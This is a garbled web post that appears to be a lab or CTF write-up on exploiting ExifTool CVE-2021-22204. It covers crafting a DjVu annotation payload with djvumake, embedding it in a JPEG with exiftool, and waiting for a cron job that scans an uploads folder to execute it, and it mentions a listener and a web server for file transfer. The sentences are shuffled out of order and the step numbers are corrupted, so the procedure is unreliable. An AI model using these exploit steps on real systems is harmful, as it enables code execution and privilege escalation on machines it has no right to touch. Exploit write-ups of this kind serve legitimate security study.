exiftool ‘-GeoTiffAsciiParams exploit.jpgġ.djvumake exploit.djvu Sjbz=mask.djvu ANTa=input.txt.This way we get to inject the response within copyright header
Manual exiftool linux code#
Note: As we noticed before, there was a script running in the remote victim machine, it was using exiftool as a scheduled task to inspect jpg files in /var/Wait for exiftool to execute the code as per the scheduled task in this case Alternative commands Start the listener and the web server for the file transfer Proceed to change the file name to look like. djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=payloadĤ.Knowing exiftool’s installed version and confirming it is vulnerable to CVE-2021-22204 (7.44 to 12.23), we proceed to exploit it Our next goal is to put the malicious payload and execute it from a JPEG file. But a DjVu file isn’t of much use for us, because it is not accepted in most of the file uploads that we find in the wild. Note: Now we have our basic exploit for Exiftool. Transfer this file to the victim machine and run exitftool against it, the output should show the contents of “id” command also djvumake exploit.djvu INFO=’1,1′ BGjp=/dev/null ANTz=payload.bzzĥ.# ANTz = Will write the compressed annotation chunk with the input file # BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image # INFO = Anything in the format ‘N,N’ where N is a number (OPTIONAL) Compress our payload file with to make it non human-readable Create a file named payload, add the following codeģ. As we verified that exiftool is vulnerable, and it is running to a folder we can write files, we can upload a crafted JPG file so exiftool executes against it Basic POCĢ. it uses exiftool to read the file and store the EXIF data of each file in /opt/metadataħ.inspect jpg files located in /var/www/html/subrion/uploads.Taking a look at the script, it does the following I tried to read the file, and I had permissionsĦ. Reading the contents of /etc/crontab I confirm this is a scheduled taskĥ. Using PSPY script, I noticed a script running quite often /opt/image-exif.sh, before that script I see cron being executed, so, I assume this is a scheduled taskĤ. To trigger the vulnerable function, we need to create a valid DjVu file that contains an annotation chunk with the payload that will be executed by the eval function as Perl code.ģ. The vulnerability happens when Exiftool tries to parse the DjVu filetype, more specifically the annotations field in the file structure.
By using a specially-crafted image file, an attacker could exploit this vulnerability to execute arbitrary code on the system.Įxiftool is a tool and library made in Perl that extracts metadata from almost any type of file. ExifTool could allow a local attacker to execute arbitrary code on the system, caused by improper neutralization of user data in the DjVu file format.
0 kommentar(er)
